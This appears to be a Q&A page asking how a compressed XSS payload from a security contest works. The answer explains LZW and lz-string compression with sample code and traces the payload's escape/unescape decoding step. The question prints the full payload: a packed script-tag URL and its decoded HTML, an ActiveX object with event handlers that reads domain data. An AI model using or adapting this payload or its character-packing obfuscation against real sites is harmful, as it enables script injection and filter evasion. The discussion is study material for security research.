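I was going through the results of a security contest involving XSS (link) and found some wonderful and scary JS XSS payloads. The winner (@kinugawamasato) used a JavaScript compression technique that seems completely otherworldly to me:
Compressed payload: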
https://cure53.de/xmas2013/?xss=<scriPt>document.write(unescape(escape(location)
.replace(/u(..)/g,'$1%')))<\/scriPt>㱯扪散琠楤㵥污獳楤㵣汳楤㨳㌳䌷䉃㐭㐶うⴱㅄ〭
䉃〴ⴰ〸ぃ㜰㔵䄸㌠潮牯睥湴敲㵡汥牴⠯繷⸪ℱ⼮數散⡲散潲摳整⠰⤩⤾㱳癧湬潡搽攮摡瑡畲氽慬汛攮
牯睤敬業㴳㍝⬧㽳慮瑡㵀Ⅱ汬潷彤潭慩湳㴧⭤潭慩渻攮捨慲獥琽❵瑦ⴷ✾
What actually happens:
<object id=e classid=clsid:333C7BC4-460F-11D0-BC04-0080C7055A83 onrowenter=alert(/~w.*!1/.exec(recordset(0)))><svg onload=e.dataurl=all[e.rowdelim=33]+'?santa=@!allow_domains='+domain;e.charset='utf-7'>
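Is this technique already documented somewhere so that I can study it? How exactly does this thing work? Is there already a JavaScript compressor that does this automatically? How would a WAF react to a payload like this?
You can see more examples here.
Best answer
I am using the lz-string library for JS compression whenever I put any data into localStorage. I am only a user of this library, not a compression expert. But here is the information that can be found around that tool...
lz-string goals: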
lz-string was designed to fulfill the need of storing large amounts of data in localStorage, specifically on mobile devices. localStorage being usually limited to 5MB, all you can compress is that much more data you can store.... I (note: "I" means Pieroxy, author of lz-string) started out from an LZW implementation (no more patents on that), which is very simple...
So the basis of this implementation is LZW, which is mentioned in Javascript client-data compression by Andy E. Let me cite:
The scenario described by Welch's 1984 paper encodes sequences of 8-bit data as fixed-length 12-bit codes. The codes from 0 to 255 represent 1-character sequences consisting of the corresponding 8-bit character, and the codes 256 through 4095 are created in a dictionary for sequences encountered in the data as it is encoded. At each stage in compression, input bytes are gathered into a sequence until the next character would make a sequence for which there is no code yet in the dictionary. The code for the sequence (without that character) is added to the output, and a new code (for the sequence with that character) is added to the dictionary.
A high level view of the encoding algorithm is shown here:
1. Initialize the dictionary to contain all strings of length one.
2. Find the longest string W in the dictionary that matches the current input.
3. Emit the dictionary index for W to output and remove W from the input.
4. Add W followed by the next symbol in the input to the dictionary.
5. Go to Step 2.
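The steps above can be sketched in a few lines of JavaScript. This is only a minimal illustration of classic LZW encoding, not code taken from lz-string: the function name `lzwEncode` is made up here, the input is assumed to contain only characters below code 256, and the dictionary is left unbounded instead of being capped at 12-bit codes.

```javascript
// Minimal LZW encoder sketch (hypothetical helper, not part of lz-string).
// Assumes every input character has a code below 256.
function lzwEncode(input) {
  // Step 1: the dictionary starts with all strings of length one.
  const dict = new Map();
  for (let i = 0; i < 256; i++) dict.set(String.fromCharCode(i), i);
  let nextCode = 256;

  const out = [];
  let w = '';
  for (let i = 0; i < input.length; i++) {
    const ch = input[i];
    if (ch.charCodeAt(0) > 255) {
      throw new RangeError('this sketch only handles characters below 256');
    }
    const wc = w + ch;
    if (dict.has(wc)) {
      // Step 2: keep extending W while the sequence is still known.
      w = wc;
    } else {
      // Step 3: emit the code for W.
      out.push(dict.get(w));
      // Step 4: add W plus the next symbol to the dictionary.
      dict.set(wc, nextCode++);
      // Step 5: continue from the symbol that broke the match.
      w = ch;
    }
  }
  if (w !== '') out.push(dict.get(w)); // flush the last sequence
  return out;
}

console.log(lzwEncode('ABABABA')); // [ 65, 66, 256, 258 ]
```

In this run the codes 256 and 258 stand for "AB" and "ABA", which is where the saving comes from: repeated sequences collapse into single codes.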
Here is how it works in the case of lz-string, as far as we can observe.
Let me cite a few steps from the already mentioned lz-string source:
What I did was:
- localStorage can only contain JavaScript strings. Strings in JavaScript are stored internally in UTF-16, meaning every character weight 16 bits. I modified the implementation to work with a 16bit-wide token space.
- I had to remove the default dictionary initialization, totally useless on a 16bit-wide token space.
- I initialize the dictionary with three tokens:
  - An entry that produces a 16-bit token.
  - An entry that produces an 8-bit token, because most of what I will store is in the iso-latin-1 space, meaning tokens below 256.
  - An entry that mark the end of the stream.
- The output is processed by a bit stream that stores effectively 16 bits per character in the output string.
- Each token is stored with just as many bits that are needed according to the size of the dictionary. Hence, the first token takes 2 bits, the second to 7th three bits, etc....
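To make the last two points more concrete, here is a rough sketch of a bit stream that packs variable-width tokens into 16-bit string characters. It is not lz-string's code: the name `packBits`, the most-significant-bit-first order, and the zero padding of the final character are all assumptions chosen for illustration, and the real library may lay out its bits differently.

```javascript
// Hypothetical bit packer: writes tokens of varying bit width into a string,
// 16 bits per character. Bit order and padding are assumptions of this sketch.
function packBits(tokens) {
  let out = '';
  let acc = 0;    // bits collected for the current 16-bit character
  let filled = 0; // how many bits of acc are in use
  for (const { value, bits } of tokens) {
    for (let i = bits - 1; i >= 0; i--) {
      acc = (acc << 1) | ((value >> i) & 1);
      filled++;
      if (filled === 16) {
        out += String.fromCharCode(acc);
        acc = 0;
        filled = 0;
      }
    }
  }
  // Pad the last, partially filled character with zero bits.
  if (filled > 0) out += String.fromCharCode(acc << (16 - filled));
  return out;
}

// A 2-bit token followed by a 3-bit token fits in a single character.
const packed = packBits([{ value: 0b10, bits: 2 }, { value: 0b101, bits: 3 }]);
console.log(packed.length, packed.charCodeAt(0).toString(16)); // 1 'a800'
```

Because every character carries a full 16 bits of arbitrary data, the resulting string can contain any code unit at all, which is why it looks like random non-Latin text.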
OK, so now we know that these compression techniques give us output made of 16-bit units. We can test it in this demo: http://pieroxy.net/blog/pages/lz-string/demo.html (or/and another one here)
It converts: Hello, world.
into
85 04 36 30 f6 60 40 03 0e 04 01 e9 80 39 03 26
00 a2
So we need one final step; let me cite again:
Well, this lib produces stuff that isn't really a string. By using all 16 bits of the UTF-16 bitspace, those strings aren't exactly valid UTF-16. By version 1.3.0, I added two helper encoders to produce stuff that we can do something with:
compress produces invalid UTF-16 strings. Those can be stored in localStorage only on webkit browsers (Tested on Android, Chrome, Safari). Can be decompressed with decompress
Continuing our example, Hello, world.
would be converted to
҅〶惶̀Ў㦀☃ꈀ
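The link between the byte dump and these characters can be checked by hand. The sketch below assumes that the demo's dump lists each 16-bit unit low byte first (little-endian), which is what matches the characters shown; `hexDumpToString` is a helper name invented for this example.

```javascript
// Hypothetical helper: read a hex dump as little-endian 16-bit units
// and turn each unit into one JavaScript string character.
function hexDumpToString(dump) {
  const bytes = dump.trim().split(/\s+/).map((h) => parseInt(h, 16));
  let out = '';
  for (let i = 0; i + 1 < bytes.length; i += 2) {
    out += String.fromCharCode(bytes[i] | (bytes[i + 1] << 8));
  }
  return out;
}

const s = hexDumpToString(
  '85 04 36 30 f6 60 40 03 0e 04 01 e9 80 39 03 26 00 a2'
);
// Print the code units so that invisible or private-use characters are not lost.
console.log([...s].map((c) => 'U+' + c.charCodeAt(0).toString(16).toUpperCase().padStart(4, '0')).join(' '));
// U+0485 U+3036 U+60F6 U+0340 U+040E U+E901 U+3980 U+2603 U+A200
```

Note that U+E901 sits in a private-use area and U+0485 and U+0340 are combining marks, so some of the nine units may not render as visible characters of their own.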
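And that is finally it. We can see that the whole set of ...non-Latin characters... comes from the final step of treating the 16-bit output as UTF-16 characters. Hopefully this gives some hint...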
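For comparison, the decoding expression in the question's payload can be traced directly, and it is simpler than LZW: escape() turns each wide character into %uXXXX, the replace() rewrites that as %XX%XX, and unescape() reads the result as two one-byte characters. The sketch below reuses that exact expression in `unpack`; the `pack` helper is hypothetical and only shows one way such a string could be produced, assuming plain ASCII input.

```javascript
// Hypothetical packer: two ASCII characters per 16-bit code unit.
// Assumes the input is plain ASCII; odd-length input is padded with a space.
function pack(ascii) {
  if (ascii.length % 2 !== 0) ascii += ' ';
  let out = '';
  for (let i = 0; i < ascii.length; i += 2) {
    out += String.fromCharCode((ascii.charCodeAt(i) << 8) | ascii.charCodeAt(i + 1));
  }
  return out;
}

// Same expression as in the payload:
// "%u3C6F" -> "%3C%6F" -> "<o"
function unpack(packed) {
  return unescape(escape(packed).replace(/u(..)/g, '$1%'));
}

console.log(escape('\u3C6F'));         // %u3C6F
console.log(unpack('\u3C6F\u626A'));   // <obj
console.log(unpack(pack('<object '))); // <object
```

This halves the character count of the payload while the number of bytes carried stays the same, which matters when a challenge limits characters and not bytes.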
Regarding "javascript - How does this JavaScript compression technique work?", a similar question can be found on Stack Overflow: https://stackoverflow.com/questions/23120115/